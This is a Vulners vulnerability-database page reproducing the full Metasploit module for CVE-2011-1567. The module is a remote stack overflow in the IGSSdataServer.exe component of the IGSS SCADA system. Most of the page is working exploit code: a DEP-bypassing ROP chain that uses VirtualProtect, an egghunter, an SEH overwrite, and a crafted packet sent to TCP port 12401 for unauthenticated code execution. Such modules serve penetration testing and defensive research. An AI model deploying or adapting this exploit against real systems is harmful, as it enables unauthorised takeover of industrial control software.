Vulners
Lucene search
7-Technologies IGSS 9.00.00 b11063 - 'IGSSdataServer.exe' Remote Stack Overflow (Metasploit)
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | 7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer Stack Overflow | 16 May 201100:00 | – | zdt |
 | CVE-2011-1567 | 16 May 201100:00 | – | circl |
 | 7T Interactive Graphical SCADA System File Operations Buffer Overflows (CVE-2011-1567; CVE-2011-4050) | 15 May 201100:00 | – | checkpoint_advisories |
 | CVE-2011-1567 | 5 Apr 201115:00 | – | cve |
 | CVE-2011-1567 | 5 Apr 201115:00 | – | cvelist |
 | 7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow | 16 May 201119:02 | – | metasploit |
| 7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow | 9 Jun 201106:04 | – | metasploit |
 | CVE-2011-1567 | 5 Apr 201115:19 | – | nvd |
 | 7T Interactive Graphical SCADA System Multiple Security Vulnerabilities | 28 Mar 201100:00 | – | openvas |
| 7T Interactive Graphical SCADA System Multiple Security Vulnerabilities | 28 Mar 201100:00 | – | openvas |
10
##
# $Id: igss9_igssdataserver_listall.rb 12639 2011-05-16 19:30:17Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Egghunter
include Msf::Exploit::Remote::Tcp
def initialize(info={})
super(update_info(info,
'Name' => "7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Overflow",
'Description' => %q{
This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies
IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application
fails to do proper bounds checking before copying data into a small buffer on the stack.
This causes a buffer overflow and allows to overwrite a structured exception handling record
on the stack, allowing for unauthenticated remote code execution.
},
'License' => MSF_LICENSE,
'Version' => '$Revision: 12639 $',
'Author' =>
[
'Luigi Auriemma', #Initial discovery, poc
'Lincoln', #Metasploit
'corelanc0d3r', #Rop exploit, combined XP SP3 & 2003 Server
'sinn3r', #Serious Msf style policing
],
'References' =>
[
['CVE', '2011-1567'],
['OSVDB', ''],
['URL', 'http://aluigi.altervista.org/adv/igss_2-adv.txt'],
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'ExitFunction' => 'process',
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3/2003 Server R2 SP2 (DEP Bypass)',
{
'Ret' => 0x1b77ca8c, #dao360.dll pivot 1388 bytes
'Offset' => 500
}
],
],
'Privileged' => false,
'DisclosureDate' => "March 24 2011",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(12401)
], self.class)
end
def junk
return rand_text(4).unpack("L")[0].to_i
end
def exploit
eggoptions =
{
:checksum => false,
:eggtag => 'w00t',
:depmethod => 'virtualprotect',
:depreg => 'esi'
}
badchars = "\x00"
hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)
#dao360.dll - pvefindaddr rop 'n roll
rop_chain = [
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b72f174, # POP EAX # RETN 08
0xA1A10101,
0x1b7762a8, # ADD EAX,5E5F0000 # RETN 08
junk,
junk,
0x1b73a55c, # XCHG EAX,EBX # RETN
junk,
junk,
0x1b724004, # pop ebp
0x1b72f15f, # &push esp # retn 8
0x1b72f040, # POP ECX # RETN
0x1B78F010, # writeable
0x1b7681c2, # xor eax,eax # retn
0x1b72495c, # add al,40 # mov [esi+4],eax # pop esi # retn 4
0x41414141,
0x1b76a883, # XCHG EAX,ESI # RETN 00
junk,
0x1b7785c1, # XOR EDX,EDX # CMP EAX,54 # SETE DL # MOV EAX,EDX # ADD ESP,8 # RETN 0C
junk,
junk,
0x1b78535c, # ADD EDX,ESI # SUB EAX,EDX # MOV DWORD PTR DS:[ECX+F8],EAX # XOR EAX,EAX # POP ESI # RETN 10
junk,
junk,
junk,
junk,
0x1b7280b4, # POP EDI # XOR EAX,EAX # POP ESI # RETN
junk,
junk,
junk,
junk,
0x1b7681c4, # rop nop (edi)
0x90909090, # esi -> eax -> nop
0x1b72f174, # POP EAX # RETN 08
0xA1F50214, # offset to &VirtualProtect
0x1b7762a8, # ADD EAX,5E5F0000 # RETN 08
junk,
junk,
0x1b73f3bd, # MOV EAX,DWORD PTR DS:[EAX] # RETN
junk,
junk,
0x1b76a883, # XCHG EAX,ESI # RETN 00
0x1b72f040, # pop ecx
0x1B78F010, # writeable (ecx)
0x1b764716, # PUSHAD # RETN
].pack('V*')
header = "\x00\x04\x01\x00\x34\x12\x0D\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"
header << rand_text(14)
sploit = rop_chain
sploit << "\x90" * 10
sploit << hunter
sploit << rand_text(target['Offset'] - (sploit.length))
sploit << [target.ret].pack('V')
sploit << egg
sploit << rand_text(2000)
connect
print_status("Sending request...")
sock.put(header + sploit)
handler
disconnect
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 May 2011 00:00Current
7High risk
Vulners AI Score7
CVSS 210
EPSS0.81111